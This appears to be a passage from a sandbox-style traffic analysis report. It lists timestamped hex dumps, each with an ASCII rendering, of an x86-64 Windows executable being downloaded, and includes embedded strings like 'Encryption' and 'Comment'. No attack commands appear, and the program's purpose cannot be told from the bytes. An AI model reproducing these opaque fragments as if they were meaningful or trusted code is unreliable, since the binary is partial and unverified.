8b ac 24 a0 00 00 00 48 8b ac 24 90 00 00 00 c7 01 00 00 00 00 48 89 d1 e8 e8 Data Ascii: HHHHH\$8H\|$0Ll$(HD$ H<LMMkL7L/L'LHHHH5H;H;;H;H@[_^A\A]A^A_AWAVAUATVWUSH(MLHHL$L$L$H$H
2022-01-30 12:43:46 UTC	1111	IN	Data Raw: 98 01 00 00 48 83 f8 64 72 76 48 89 f1 e8 80 fc ff ff 8b ae 90 01 00 00 ff c5 89 ae 90 01 00 00 4c 8d 76 08 bf 11 00 00 00 48 8d 5c 24 20 48 8b 0c fe 48 8b 01 48 89 da ff 50 18 48 8b 46 18 4c 8b 40 28 4c 89 f1 48 89 da e8 eb ab fc ff 48 8b 0c fe 48 8b 01 ff 50 08 40 f6 c5 01 75 0b d1 ed 48 ff c7 48 83 ff 31 75 c5 48 8d 4c 24 20 ba 72 00 00 00 e8 d9 34 03 00 48 89 f1 e8 7e fc ff ff 48 8b 8c 24 98 00 00 00 48 31 e1 e8 e1 ce 03 00 90 48 81 c4 a0 00 00 00 5b 5d 5f 5e 41 5e c3 cc cc 56 48 83 ec 20 48 89 ce 48 8b 09 48 8b 56 10 e8 9c 34 03 00 ba 40 00 00 00 48 89 f1 e8 8f 34 03 00 48 89 f1 48 83 c4 20 5e e9 74 b2 fc ff 56 57 53 48 83 ec 20 48 89 d7 48 89 ce 48 c7 41 08 00 00 00 00 4c 8b 41 10 4d 85 c0 74 51 31 c9 49 29 c8 48 03 0e ba 01 00 00 00 49 89 f9 e8 07 Data Ascii: HdrvHLvH\$ HHHPHFL@(LHHHP@uHH1uHL$ r4H~H$H1H[]_^A^VH HHHV4@H4HH ^tVWSH HHHALAMtQ1I)HI
2022-01-30 12:43:46 UTC	1118	IN	Data Raw: 0f 84 75 ff ff ff 48 b8 45 6e 63 72 79 70 74 69 48 33 84 24 90 00 00 00 48 b9 72 79 70 74 69 6f 6e 00 48 33 8c 24 93 00 00 00 48 09 c1 0f 85 48 ff ff ff 4c 89 e9 e8 ad f6 ff ff 48 85 c0 0f 84 37 ff ff ff 48 89 c1 e8 b7 93 fc ff 48 8d 94 24 90 00 00 00 4c 89 e9 e8 2f f6 ff ff 84 c0 0f 84 17 ff ff ff 48 b8 43 6f 6d 6d 65 6e 74 00 48 39 84 24 90 00 00 00 0f 85 ff fe ff ff 4c 89 e9 e8 64 f6 ff ff 48 85 c0 0f 84 ee fe ff ff 48 89 c6 48 85 ed 0f 84 c8 04 00 00 48 89 75 00 e9 c7 04 00 00 48 89 7c 24 30 31 f6 31 ed 31 ff e9 92 03 00 00 48 8d 35 28 8d 07 00 45 31 e4 31 db e9 47 02 00 00 48 89 f1 e8 38 93 fc ff 49 8b 55 20 48 8d 74 24 78 48 89 f1 e8 85 91 fc ff 48 89 f1 e8 91 c1 01 00 48 89 c6 48 8d 05 32 8e 07 00 48 89 44 24 30 48 85 f6 74 af 4c 89 7c 24 38 4c 89 Data Ascii: uHEncryptiH3$HryptionH3$HHLH7HH$L/HCommentH9$LdHHHHuH\|$0111H5(E11GH8IU Ht$xHHHH2HD$0HtL\|$8L
2022-01-30 12:43:46 UTC	1126	IN	Data Raw: 8d ff ff ff 48 8b 4e 08 48 85 c9 74 0d e8 ba a4 fc ff 48 c7 46 08 00 00 00 00 48 8b 4e 10 48 85 c9 74 0d e8 a4 a4 fc ff 48 c7 46 10 00 00 00 00 48 8b 4e 38 48 85 c9 74 0d e8 85 74 fc ff 48 c7 46 38 00 00 00 00 48 83 c4 20 5e c3 56 57 48 83 ec 68 48 89 cf 48 8b 05 45 d1 08 00 48 31 e0 48 89 44 24 60 48 8b 02 48 8b 4a 08 48 8d 54 24 30 48 89 02 48 89 4a 10 48 c7 42 08 00 00 00 00 c7 42 18 00 00 00 00 48 89 52 20 48 8d 74 24 20 48 89 f1 e8 0e 71 fc ff 48 8d 15 e9 8f 07 00 48 89 f1 e8 db a1 01 00 84 c0 74 63 b9 01 00 00 00 ba 48 00 00 00 45 31 c0 e8 8d 73 fc ff 48 89 c6 48 89 78 40 48 8b 4c 24 50 e8 5e b1 fc ff 48 89 46 10 48 8b 4c 24 50 e8 50 b1 fc ff 48 89 46 08 0f 57 c0 0f 11 46 18 0f 11 46 28 48 c7 46 38 00 00 00 00 48 8b 44 24 50 83 78 18 00 74 14 48 89 Data Ascii: HNHtHFHNHtHFHN8HttHF8H ^VWHhHHEH1HD$`HHJHT$0HHJHBBHR Ht$ HqHHtcHE1sHHx@HL$P^HFHL$PPHFWFF(HF8HD$PxtH
2022-01-30 12:43:46 UTC	1134	IN	Data Raw: 01 fc 49 01 f4 48 89 ee 48 c1 c6 24 48 89 ef 48 c1 c7 1e 48 31 f7 48 89 ee 48 c1 c6 19 48 31 fe 48 89 ef 48 21 cf 48 89 eb 48 09 cb 48 21 c3 48 09 fb 48 01 f3 4d 01 e5 4c 89 ee 48 c1 c6 32 49 01 dc 4c 89 ef 48 c1 c7 2e 48 31 f7 4c 89 ee 48 c1 c6 17 48 31 fe 4c 89 c7 4c 31 df 4c 21 ef 4c 31 df 4f 03 4c d6 20 4e 03 8c d4 b0 00 00 00 49 01 f9 4c 89 cf 48 01 f7 4c 89 e2 48 c1 c2 24 4c 89 e3 48 c1 c3 1e 48 31 d3 4c 89 e2 48 c1 c2 19 48 31 da 4c 89 e6 48 21 ee 4d 89 e1 49 09 e9 49 21 c9 49 09 f1 49 01 d1 48 01 f8 48 89 c2 48 c1 c2 32 49 01 f9 48 89 c6 48 c1 c6 2e 48 31 d6 48 89 c2 48 c1 c2 17 48 31 f2 4c 89 ee 4c 31 c6 48 21 c6 4c 31 c6 4f 03 5c d6 28 4e 03 9c d4 b8 00 00 00 49 01 f3 4c 89 de 48 01 d6 4c 89 ca 48 c1 c2 24 4c 89 cb 48 c1 c3 1e 48 31 d3 4c 89 ca Data Ascii: IHH$HHH1HHH1HH!HHH!HHMLH2ILH.H1LHH1LL1L!L1OL NILHLH$LHH1LHH1LH!MII!IIHHH2IHH.H1HHH1LL1H!L1O\(NILHLH$LHH1L
2022-01-30 12:43:46 UTC	1142	IN	Data Raw: 58 18 48 89 d9 e8 33 30 fc ff 48 89 d9 ba 02 00 00 00 e8 26 30 fc ff 48 89 d9 4c 89 f2 e8 18 31 fc ff 48 89 d9 4c 89 e2 e8 0d 31 fc ff 8b 46 10 4c 8b 0e 41 8b 17 49 8b 4f 10 48 8b 49 20 48 8b 59 08 4c 89 6c 24 28 89 44 24 20 41 b8 5c 00 00 00 ff 53 48 48 89 f1 e8 51 5d 01 00 49 8b 8f 40 40 00 00 48 89 fa e8 5b 55 01 00 48 89 f9 e8 d0 35 fc ff 49 8b 8f 40 40 00 00 31 d2 e8 5e 4a 01 00 48 89 c7 48 85 c0 0f 85 67 ff ff ff 49 8b 8f 48 40 00 00 31 ff 31 d2 e8 42 4a 01 00 48 85 c0 0f 84 a9 00 00 00 48 89 c3 4c 8d 35 19 c7 06 00 8b 43 10 83 c8 02 83 f8 03 75 1a ff c7 49 8b 8f 48 40 00 00 89 fa e8 14 4a 01 00 48 89 c3 48 85 c0 75 dd eb 7a e8 56 5c 01 00 48 89 c6 8b 53 08 48 8d 48 18 e8 54 2f fc ff 8b 46 10 4c 8b 0e 41 8b 17 49 8b 4f 10 48 8b 49 20 4c 8b 51 08 4c Data Ascii: XH30H&0HL1HL1FLAIOHI HYLl$(D$ A\SHHQ]I@@H[UH5I@@1^JHHgIH@11BJHHL5CuIH@JHHuzV\HSHHT/FLAIOHI LQL
2022-01-30 12:43:46 UTC	1150	IN	Data Raw: 47 20 48 89 6f 28 4c 89 f1 e8 38 3a 01 00 48 89 87 80 00 00 00 e8 d6 3d 01 00 48 89 87 88 00 00 00 b0 01 45 84 ed 75 14 48 8d 15 97 67 07 00 4c 89 f9 e8 91 0c 00 00 85 c0 0f 99 c0 88 47 30 48 8d 05 5b fd 05 00 48 89 87 b0 00 00 00 48 89 d9 e8 c9 f4 fe ff 48 89 d8 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 48 8b 41 d8 48 8b 00 c3 8b 41 88 c3 56 57 48 83 ec 28 48 89 ce 48 8d b9 50 ff ff ff 48 8b 89 58 ff ff ff e8 06 25 fb ff 48 8b 4e d0 e8 69 16 fc ff 48 8b 4e d8 e8 ca 3d 01 00 48 8b 4e e0 e8 57 16 fc ff 48 8b 4e f0 e8 4e 16 fc ff 48 8b 8e 70 ff ff ff e8 42 16 fc ff 48 89 f9 48 83 c4 28 5f 5e e9 34 16 fc ff 41 57 41 56 41 54 56 57 53 48 83 ec 38 49 89 ce 48 8b 05 fb 72 08 00 48 31 e0 48 89 44 24 30 4c 8d b9 50 ff ff ff 8b 81 50 ff ff ff 3d 02 01 00 Data Ascii: G Ho(L8:H=HEuHgLG0H[HHHH([]_^A\A]A^A_HAHAVWH(HHPHX%HNiHN=HNWHNNHpBHH(_^4AWAVATVWSH8IHrH1HD$0LPP=
2022-01-30 12:43:46 UTC	1158	IN	Data Raw: 90 04 48 63 47 f0 89 c1 44 29 f1 81 e1 ff 7f 00 00 8a 94 0f f0 7f ff ff 88 94 07 f0 7f ff ff 8b 47 f0 ff c0 25 ff 7f 00 00 89 47 f0 48 8b 4f f8 48 83 c1 18 e8 0f f1 fb ff 83 af 88 7e ff ff 01 73 c0 4c 8d 0d 04 03 00 00 e9 33 fb ff ff 83 f8 10 0f 8c 96 02 00 00 8b 8f e8 7f ff ff 0f b7 d1 89 97 90 7e ff ff 83 c0 f0 89 87 ec 7f ff ff c1 e9 10 89 8f e8 7f ff ff c7 87 68 7e ff ff 0b 00 00 00 e9 fa fa ff ff 83 f8 10 0f 8c 5d 02 00 00 8b 8f 90 7e ff ff 8b 97 e8 7f ff ff 89 d6 f7 d6 83 c0 f0 89 87 ec 7f ff ff c1 ea 10 89 97 e8 7f ff ff 0f b7 c6 39 c1 0f 85 72 02 00 00 85 c9 74 64 c7 87 68 7e ff ff 0c 00 00 00 e9 b1 fa ff ff 83 f8 08 0f 8c 14 02 00 00 8a 97 e8 7f ff ff 48 63 47 f0 88 94 07 f0 7f ff ff 8b 47 f0 ff c0 25 ff 7f 00 00 89 47 f0 48 8b 4f f8 48 83 c1 18 Data Ascii: HcGD)G%GHOH~sL3~h~]~9rtdh~HcGG%GHOH
2022-01-30 12:43:46 UTC	1165	IN	Data Raw: 00 e9 61 01 00 00 4c 89 e9 ba fc 00 00 00 e9 4c 01 00 00 40 80 fd f0 0f 85 68 01 00 00 41 8b 4d 6c 83 f9 23 0f 8f ab 01 00 00 83 f9 18 0f 84 91 02 00 00 83 f9 20 0f 85 23 06 00 00 49 8b 46 e0 48 83 78 10 01 0f 85 4f 03 00 00 48 8b 40 08 80 38 01 0f 85 42 03 00 00 49 8b 4e f0 ba 35 00 00 00 e8 8a ea fa ff 48 89 c7 48 89 c1 e8 80 f6 03 00 48 8d 48 14 ba 01 00 00 00 45 31 c0 e8 87 d7 fb ff 48 89 c5 c7 00 ff fa 20 00 48 8d 48 04 48 89 fa e8 ca ec 03 00 48 89 f9 e8 52 f6 03 00 48 c1 e0 20 48 b9 00 00 00 00 04 00 00 00 48 01 c1 48 c1 f9 20 c6 44 0d 00 ff 48 b9 00 00 00 00 05 00 00 00 48 01 c1 48 c1 f9 20 c6 44 0d 00 f0 48 b9 00 00 00 00 06 00 00 00 4c 8d 04 08 49 c1 f8 20 49 8b 8e 70 ff ff ff 48 8b 01 48 89 ea ff 50 10 49 89 46 d0 49 8b 4e 88 48 8d 15 e9 07 07 Data Ascii: aLL@hAMl# #IFHxOH@8BIN5HHHHE1H HHHHRH HHH DHHH DHLI IpHHPIFINH
2022-01-30 12:43:46 UTC	1173	IN	Data Raw: 00 00 8b 5c 24 60 eb 10 48 8b b4 24 a0 00 00 00 48 8b ac 24 90 00 00 00 45 84 ed 0f 85 bb 00 00 00 49 8b 46 28 48 8b 7c 24 68 48 8b 0c f8 89 ea 4c 8b 44 24 78 e8 de 97 00 00 49 8b 46 28 48 8b 04 f8 48 8b 40 18 48 8b 94 24 e0 00 00 00 48 8b 8c 24 80 00 00 00 89 0c 10 49 8b 46 28 48 8b 04 f8 48 8b 40 18 89 5c 10 04 49 8b 46 28 48 8b 04 f8 48 8b 40 18 8a 4c 24 58 88 4c 10 08 8a 4c 24 53 88 4c 10 09 8a 4c 24 52 88 4c 10 0a 8a 4c 24 51 88 4c 10 0b 8a 4c 24 50 88 4c 10 0c 8a 4c 24 4f 88 4c 10 0d 8a 4c 24 4e 88 4c 10 0e 8a 4c 24 4d 88 4c 10 0f 39 6c 24 74 75 21 49 8b 46 28 48 8b 4c 24 68 48 8b 04 c8 48 8b 40 18 48 8b 8c 24 88 00 00 00 81 4c 88 04 00 00 00 80 0f ba e3 16 4c 8b ac 24 a8 00 00 00 0f 83 93 00 00 00 ff c5 41 3b ae 78 01 00 00 0f 8d 84 00 00 00 48 83 Data Ascii: \$`H$H$EIF(H\|$hHLD$xIF(HH@H$H$IF(HH@\IF(HH@L$XLL$SLL$RLL$QLL$PLL$OLL$NLL$ML9l$tu!IF(HL$hHH@H$LL$A;xH
2022-01-30 12:43:46 UTC	1181	IN	Data Raw: a6 00 00 48 89 c7 48 89 f1 44 89 e2 41 b0 01 e8 b7 03 00 00 48 89 f9 48 89 c2 41 89 d8 e8 6a ae 00 00 ff c3 41 39 de 75 dd 48 8b 4e 18 48 85 c9 74 3c 31 d2 e8 e4 b1 00 00 48 85 c0 74 27 48 89 c3 48 8b 4b 18 e8 b9 99 fb ff 48 89 d9 e8 b1 99 fb ff 48 8b 4e 18 31 d2 e8 c0 b1 00 00 48 89 c3 48 85 c0 75 dc 48 8b 4e 18 e8 b6 a6 00 00 48 89 7e 18 31 ff 89 be d0 01 00 00 48 8b 8e 68 0e 00 00 41 b8 01 00 00 00 48 89 ea e8 33 99 fb ff 48 89 86 68 0e 00 00 8b 8e 78 01 00 00 85 c9 0f 48 cf 44 39 e1 7d 27 89 c9 f6 c1 07 0f 94 04 08 48 ff c1 48 39 e9 74 16 48 8b 86 68 0e 00 00 f6 c1 07 0f 94 04 08 48 ff c1 48 39 cd 75 ea 8b 86 d0 00 00 00 85 c0 8b 54 24 34 78 08 44 89 ff 44 39 f0 7c 06 89 be d0 00 00 00 44 39 a6 d4 00 00 00 7c 0b 41 8d 44 24 ff 89 86 d4 00 00 00 8b 8e Data Ascii: HHDAHHAjA9uHNHt<1Ht'HHKHHN1HHuHNH~1HhAH3HhxHD9}'HH9tHhHH9uT$4xDD9\|D9\|AD$
2022-01-30 12:43:46 UTC	1189	IN	Data Raw: 0e 00 00 8b ae 8c 0e 00 00 8d 1c 2a ff cd 39 d9 0f 4d ea 89 ae 94 0e 00 00 43 8d 54 2d 00 8b 8e 88 0e 00 00 8d 2c 01 39 ea 0f 8d fb 00 00 00 89 8e 90 0e 00 00 e9 09 01 00 00 83 f9 02 0f 82 00 01 00 00 44 89 ae 90 0e 00 00 89 be 94 0e 00 00 e9 ee 00 00 00 81 ff de 00 00 00 0f 8f eb 01 00 00 81 fd de 00 00 00 0f 8f df 01 00 00 83 c5 21 83 c7 21 41 83 c0 20 89 6c 24 20 48 8d 15 9c 94 06 00 48 8d 4c 24 50 41 89 f9 e9 ba fe ff ff 83 fd 06 0f 85 9a 01 00 00 41 ff ce 41 83 fe 02 0f 87 8d 01 00 00 8b 96 d8 11 00 00 48 89 f1 e8 e5 f4 ff ff e9 7a 01 00 00 44 8b 86 78 01 00 00 4c 8b 8e 80 0e 00 00 4c 89 ca 48 c1 ea 20 44 89 e9 44 29 c9 45 8d 50 01 41 0f af ca 89 f8 29 d0 01 c8 4c 8b 9e 88 0e 00 00 4c 89 d9 48 c1 e9 20 44 89 db 44 29 cb 41 0f af da 89 cd 29 d5 01 dd Data Ascii: *9MCT-,9D!!A l$ HHL$PAAAHzDxLLH DD)EPA)LLH DD)A)
2022-01-30 12:43:46 UTC	1197	IN	Data Raw: c1 e9 20 4c 89 fa 48 c1 ea 20 31 ed 39 ca 40 0f 9c c5 31 c9 41 39 c7 0f 9c c1 0f 45 e9 40 80 fd 01 75 44 48 8b 86 c8 00 00 00 48 8b ae 80 0e 00 00 48 89 c2 48 c1 ea 20 48 89 e9 48 c1 e9 20 31 db 39 d1 0f 9c c3 31 c9 39 c5 0f 9c c1 0f 45 d9 80 fb 01 75 12 c7 86 74 0e 00 00 00 00 00 00 48 8b 44 24 48 0f 11 30 c6 86 8e 01 00 00 01 80 be e9 10 00 00 00 4c 8b 7c 24 58 48 8b 6c 24 28 0f 85 d5 12 00 00 e9 ba 12 00 00 f6 06 01 0f 84 24 02 00 00 c7 86 70 0e 00 00 01 00 00 00 c7 86 58 02 00 00 00 00 00 00 e9 ae 12 00 00 f6 06 02 0f 84 6f 02 00 00 8b 86 74 01 00 00 85 c0 0f 8e a4 00 00 00 31 ed 4c 89 7c 24 58 4c 89 b4 24 80 00 00 00 48 89 f1 89 ea 41 b8 b8 0f 00 00 41 b9 01 00 00 00 e8 b7 b6 ff ff 48 89 c3 44 8b 86 78 01 00 00 44 3b 40 04 74 12 48 89 f1 48 89 da e8 Data Ascii: LH 19@1A9E@uDHHHH HH 1919EutHD$H0L\|$XHl$($pXot1L\|$XL$HAAHDxD;@tHH
2022-01-30 12:43:46 UTC	1204	IN	Data Raw: 45 31 c9 e8 c9 10 fb ff 48 8b 8e b8 10 00 00 48 89 ea 41 89 f8 45 31 c9 e8 b4 10 fb ff 48 8b 8e b8 10 00 00 48 8d 15 6c 58 06 00 41 b8 02 00 00 00 45 31 c9 e8 98 10 fb ff 48 8b 6c 24 28 e9 d7 f3 ff ff 48 89 f1 e8 fe 2b 00 00 80 be 85 11 00 00 00 74 11 48 8b 8e c8 10 00 00 48 85 c9 74 05 e8 64 19 fb ff 48 8b 8c 24 38 02 00 00 48 31 e1 e8 fc 57 02 00 0f 28 b4 24 40 02 00 00 48 81 c4 58 02 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c8 d0 ff ff 89 f3 ff ff ef da ff ff 38 db ff ff 60 db ff ff ec db ff ff e3 db ff ff d9 db ff ff 1e dc ff ff 94 dc ff ff ac dc ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff c4 dc ff ff df d0 ff ff 0a d5 ff ff fc d0 ff ff 80 d1 ff ff df d1 Data Ascii: E1HHAE1HHlXAE1Hl$(H+tHHtdH$8H1W($@HX[]_^A\A]A^A_8`
2022-01-30 12:43:46 UTC	1212	IN	Data Raw: 02 00 90 48 83 c4 40 5b 5d 5f 5e 41 5c 41 5e 41 5f c3 56 48 83 ec 20 80 b9 e9 10 00 00 00 74 35 48 89 ce 80 b9 ea 10 00 00 00 75 29 48 89 f1 e8 e9 53 ff ff c6 86 ea 10 00 00 01 48 8d 15 19 00 00 00 b9 14 00 00 00 49 89 f0 e8 76 27 00 00 89 86 ec 10 00 00 48 83 c4 20 5e c3 56 57 48 83 ec 28 89 d7 48 89 ce 80 b9 f0 10 00 00 00 74 25 39 be f4 10 00 00 75 1d 80 b6 fc 00 00 00 01 c6 86 f0 10 00 00 00 48 89 f1 e8 a2 76 ff ff c6 86 e9 10 00 00 01 80 be f1 10 00 00 00 74 25 39 be f8 10 00 00 75 1d 80 b6 fb 00 00 00 01 c6 86 f1 10 00 00 00 48 89 f1 e8 c5 76 ff ff c6 86 e9 10 00 00 01 80 be 81 01 00 00 00 74 16 39 be 84 01 00 00 75 0e c6 86 81 01 00 00 00 c6 86 e9 10 00 00 01 80 be ea 10 00 00 00 74 0f 39 be ec 10 00 00 75 07 c6 86 ea 10 00 00 00 80 be e9 10 00 00 Data Ascii: H@[]_^A\A^A_VH t5Hu)HSHIv'H ^VWH(Ht%9uHvt%9uHvt9ut9u
2022-01-30 12:43:46 UTC	1220	IN	Data Raw: 00 00 00 45 89 e7 45 29 cf 44 39 fe 41 0f 4f f7 42 8d 2c 0e 48 8b 99 c8 00 00 00 4c 8b 91 88 0e 00 00 4c 89 d1 48 c1 e9 20 48 89 da 48 c1 ea 20 31 c0 39 ca 0f 9c c0 31 d2 44 39 d3 0f 9c c2 0f 45 c2 3c 01 0f 85 49 01 00 00 49 8b 96 80 0e 00 00 49 89 d0 49 c1 e8 20 31 c0 45 39 c4 0f 9f c0 31 ff 39 d3 40 0f 9f c7 0f 45 c7 3c 01 0f 85 20 01 00 00 45 85 ed 44 89 c8 0f 48 c5 31 ff 44 39 c0 40 0f 9e c7 31 c0 39 d3 0f 9c c0 0f 44 c7 3c 01 0f 85 e6 00 00 00 31 c0 45 85 ed 0f 49 c6 44 89 e2 29 c2 31 c0 39 ca 0f 9d c0 31 d2 44 39 d3 0f 9f c2 0f 44 d0 80 fa 01 0f 85 be 00 00 00 89 f0 f7 d8 45 85 ed 0f 49 c6 41 01 c0 45 89 86 84 0e 00 00 01 c8 41 89 86 8c 0e 00 00 44 89 e1 45 39 c8 7d 27 48 8d 0d 8a 83 06 00 48 8d 15 73 99 06 00 41 b8 6c 0b 00 00 e8 5c d8 02 00 45 8b Data Ascii: EE)D9AOB,HLLH HH 191D9E<IIII 1E919@E< EDH1D9@19D<1EID)191D9DEIAEADE9}'HHsAl\E
2022-01-30 12:43:46 UTC	1228	IN	Data Raw: 0b ff cb eb 02 ff c3 48 ff c6 eb e0 85 db 74 05 80 fa 3a 74 f2 4c 89 f1 e8 04 12 02 00 48 85 c0 0f 94 c0 48 0f 45 fe 40 08 e8 3c 01 74 d9 48 89 f7 48 89 f8 48 83 c4 20 5b 5d 5f 5e 41 5e c3 56 48 83 ec 30 48 8b 05 16 3b 07 00 48 31 e0 48 89 44 24 28 48 8d 44 24 26 88 10 c6 40 01 00 48 89 c2 41 b0 01 e8 68 ff ff ff 48 89 c6 48 8b 4c 24 28 48 31 e1 e8 38 fa 01 00 48 89 f0 48 83 c4 30 5e c3 56 48 83 ec 30 48 8b 05 d3 3a 07 00 48 31 e0 48 89 44 24 28 48 8d 44 24 26 88 10 c6 40 01 00 48 89 c2 45 31 c0 e8 25 ff ff ff 48 89 c6 48 8b 4c 24 28 48 31 e1 e8 f5 f9 01 00 48 89 f0 48 83 c4 30 5e c3 41 56 56 57 55 53 48 83 ec 20 48 89 cf 80 39 5b 75 7b 4c 8d 77 01 31 f6 4c 89 f3 0f b6 2b 85 ed 74 3a 40 80 fd 5d 74 34 89 e9 e8 55 ea 02 00 85 c0 75 08 40 80 fd 3a 75 07 ff Data Ascii: Ht:tLHHE@<tHHH []_^A^VH0H;H1HD$(HD$&@HAhHHL$(H18HH0^VH0H:H1HD$(HD$&@HE1%HHL$(H1HH0^AVVWUSH H9[u{Lw1L+t:@]t4Uu@:u
2022-01-30 12:43:46 UTC	1236	IN	Data Raw: 48 8d 15 c2 6a 05 00 48 89 f9 41 b0 73 49 89 c1 e8 73 70 fa ff 8b 8c 24 f0 00 00 00 e8 57 79 fb ff 48 85 c0 74 14 45 84 ed 74 0f 8b 80 a0 00 00 00 83 e0 01 0f 85 ec 00 00 00 48 8d 15 18 54 05 00 4c 8d 05 27 b0 05 00 4c 8d 0d e4 53 05 00 4c 89 e1 e8 5b 67 fa ff 49 89 c6 b9 01 00 00 00 e8 b5 63 fa ff 49 89 c7 b9 03 00 00 00 e8 a8 63 fa ff 48 89 c3 b9 02 00 00 00 e8 9b 63 fa ff 48 89 c5 31 c9 e8 91 63 fa ff 48 89 c7 b9 77 00 00 00 e8 84 63 fa ff 48 89 c6 48 8d 0d 1f a1 05 00 e8 78 63 fa ff 4c 89 7c 24 70 4c 8d 3d 46 e0 f9 ff 48 8d 0d 0e 4e 05 00 48 89 4c 24 68 48 89 5c 24 60 48 8d 0d d0 cd 05 00 48 89 4c 24 58 48 89 6c 24 50 48 8d 0d a6 5a 05 00 48 89 4c 24 48 48 89 7c 24 40 48 8d 0d 38 6e 05 00 48 89 4c 24 38 48 89 74 24 30 48 8d 0d 5a de f9 ff 48 89 4c 24 Data Ascii: HjHAsIsp$WyHtEtHTL'LSL[gIcIcHcH1cHwcHHxcL\|$pL=FHNHL$hH\$`HHL$XHl$PHZHL$HH\|$@H8nHL$8Ht$0HZHL$
2022-01-30 12:43:46 UTC	1243	IN	Data Raw: ff ff 48 39 f0 74 1f 48 8d 0d b9 41 06 00 48 8d 15 86 3a 06 00 41 b8 16 05 00 00 48 83 c4 28 5f 5e e9 73 7b 02 00 90 48 83 c4 28 5f 5e c3 45 31 c0 48 39 0a 41 0f 92 c0 b8 ff ff ff ff 41 0f 46 c0 c3 44 8b 01 8b 4a 08 b8 ff ff ff ff 41 39 c8 7c 0b 03 4a 0c 31 c0 41 39 c8 0f 9d c0 c3 48 8b 49 08 e9 38 b4 ff ff cc cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec 98 07 00 00 0f 29 b4 24 80 07 00 00 4d 89 cf 4c 89 c3 49 89 d4 48 89 8c 24 88 00 00 00 48 8b bc 24 00 08 00 00 48 8b 05 3d fc 06 00 48 31 e0 48 89 84 24 78 07 00 00 44 8b 2f 49 8b 41 08 48 85 c0 0f 84 81 00 00 00 80 38 00 0f 84 1c 01 00 00 31 f6 b9 01 00 00 00 ba 30 00 00 00 45 31 c0 e8 ad 9e fa ff 48 89 30 44 89 68 10 44 89 68 08 c7 40 0c 01 00 00 00 48 89 70 28 0f 57 c0 0f 11 40 14 4c 89 e1 48 89 c2 Data Ascii: H9tHAH:AH(_^s{H(_^E1H9AAFDJA9\|J1A9HI8AWAVAUATVWUSH)$MLIH$H$H=H1H$xD/IAH810E1H0DhDh@Hp(W@LH
2022-01-30 12:43:46 UTC	1251	IN	Data Raw: c3 48 85 c0 74 08 48 8b 03 83 38 02 74 1c 48 8d 0d d0 29 06 00 48 8d 15 3f 1b 06 00 41 b8 59 08 00 00 e8 32 5c 02 00 48 8b 03 44 8b 43 08 41 8d 50 01 45 8d 0c 38 41 ff c1 44 03 40 40 48 8b 0e 48 83 c4 20 5b 5f 5e 48 ff 25 7b 8b 06 00 41 56 56 57 53 48 83 ec 28 48 89 d6 48 89 ca 48 89 f1 e8 21 ff ff ff 48 89 c7 48 85 c0 74 08 48 8b 07 83 38 02 74 1c 48 8d 0d 69 29 06 00 48 8d 15 d8 1a 06 00 41 b8 64 08 00 00 e8 cb 5b 02 00 48 8b 07 83 78 40 00 7e 25 31 db 4c 8b 35 01 8d 06 00 8b 47 08 8d 14 03 ff c2 48 8b 0e 41 ff d6 85 c0 75 28 ff c3 48 8b 07 3b 58 40 7c e4 48 8d 0d 54 4a 06 00 48 8d 15 91 1a 06 00 41 b8 68 08 00 00 e8 84 5b 02 00 e8 ef 05 fb ff 89 d8 48 83 c4 28 5b 5f 5e 41 5e c3 56 57 53 48 83 ec 20 44 89 c3 48 89 d6 48 89 ca 48 89 f1 e8 88 fe ff ff 48 Data Ascii: HtH8tH)H?AY2\HDCAPE8AD@@HH [_^H%{AVVWSH(HHH!HHtH8tHi)HAd[Hx@~%1L5GHAu(H;X@\|HTJHAh[H([_^A^VWSH DHHHH
2022-01-30 12:43:46 UTC	1259	IN	Data Raw: 8b 44 24 38 85 c0 0f 8e 97 00 00 00 8b 0d 7f cf 06 00 89 4c 24 2c 8b 0d 85 d3 06 00 89 4c 24 28 8b 0d 8b d7 06 00 48 89 4c 24 40 41 89 c7 31 ed 48 8b 7c 24 30 41 8b 04 ac 89 c1 48 8d 15 5f cf 06 00 2b 4c 24 2c 7c 22 3b 4c 24 28 7d 24 48 8b 54 24 40 89 d0 01 c8 8d 4c 0a 7f 0f 49 c8 83 e1 80 29 c8 48 8d 15 47 d3 06 00 48 98 4c 8b 34 c2 eb 03 45 31 f6 4c 89 f1 e8 74 7f 02 00 48 63 d8 48 89 f9 4c 89 f2 49 89 d8 e8 83 8e 01 00 48 01 df 48 83 c7 02 66 c7 47 fe 0d 0a 48 ff c5 49 39 ef 75 92 b9 02 00 00 00 48 8b 7c 24 30 48 89 fa 45 89 e8 41 b1 01 e8 03 63 00 00 48 89 f9 e8 c0 60 fa ff 4c 89 e1 e8 b8 60 fa ff 8b 05 d0 d2 06 00 03 05 ba ce 06 00 0f 8e f3 fd ff ff 45 31 f6 48 8b 3d 52 6e 06 00 31 db 48 89 5c 24 20 48 89 f1 ba e9 03 00 00 41 b8 85 01 00 00 45 31 c9 Data Ascii: D$8L$,L$(HL$@A1H\|$0AH_+L$,\|";L$(}$HT$@LI)HGHL4E1LtHcHLIHHfGHI9uH\|$0HEAcH`L`E1H=Rn1H\$ HAE1
2022-01-30 12:43:46 UTC	1267	IN	Data Raw: 0c 81 3d 6a cc 06 00 00 02 00 00 74 1f b1 01 e8 5c 45 00 00 4c 89 35 66 cc 06 00 4c 89 25 67 cc 06 00 c7 05 49 cc 06 00 00 02 00 00 b9 05 00 00 00 44 89 e2 e8 3d f0 00 00 41 f6 c6 13 0f 84 34 31 00 00 ff 15 d8 4d 06 00 4c 39 e8 0f 85 25 31 00 00 31 c0 41 f6 c6 10 0f 94 c0 83 c8 02 41 f6 c6 01 be 01 00 00 00 0f 44 f0 e8 21 8c 00 00 41 89 c7 44 89 f7 83 e7 08 c1 ef 03 41 83 e6 04 41 c1 ee 02 44 89 e1 c1 f9 10 8b 2d 66 c3 06 00 89 c8 29 e8 ff c0 45 85 e4 0f 49 c1 2b 05 90 c3 06 00 99 f7 fd 89 c3 44 89 e1 c1 e1 10 41 0f bf d4 8b 2d 3b c3 06 00 89 d0 29 e8 ff c0 85 c9 0f 49 c2 2b 05 6e c3 06 00 99 f7 fd 89 c5 89 f1 e8 1d 8c 00 00 48 8b 0d 47 c3 06 00 44 88 7c 24 40 40 88 7c 